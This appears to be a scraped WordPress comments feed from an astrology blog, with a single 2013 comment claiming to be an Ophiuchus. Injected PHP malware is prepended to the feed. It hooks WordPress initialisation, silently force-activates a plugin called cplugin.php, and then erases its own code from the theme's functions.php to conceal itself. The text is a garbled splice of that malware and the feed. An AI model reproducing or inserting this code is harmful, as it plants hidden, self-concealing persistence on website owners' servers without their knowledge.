if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'cplugin.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('cplugin.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home1/c205615/budgetfamilyvacations.com/wp-content/plugins/cplugin.php'); //file_put_contents('/home1/c205615/budgetfamilyvacations.com/wp-content/plugins/cplugin.php', ''); } } add_action('init', 'true_plugins_activate');} Comments for OPI's Blog http://www.stardial.us/opi Just another WordPress weblog Wed, 22 May 2013 18:35:46 +0000 http://wordpress.org/?v=2.9.1 hourly 1 Comment on Are You an Ophiuchus? www.stardial.us by ashley j http://www.stardial.us/opi/?p=11&cpage=1#comment-41 ashley j Wed, 22 May 2013 18:35:46 +0000 http://www.stardial.us/opi/?p=11#comment-41 So I am an Ophiuchus. I feel it, I know it, I always knew it. When I meditate I see/feel rainbow auraed wings/energy. I was never able to believe in religious mantra growing up. I believe nature and astrology to be the two greatest learning tools mankind has. Email me :) So I am an Ophiuchus. I feel it, I know it, I always knew it. When I meditate I see/feel rainbow auraed wings/energy. I was never able to believe in religious mantra growing up. I believe nature and astrology to be the two greatest learning tools mankind has. Email me :)

]]>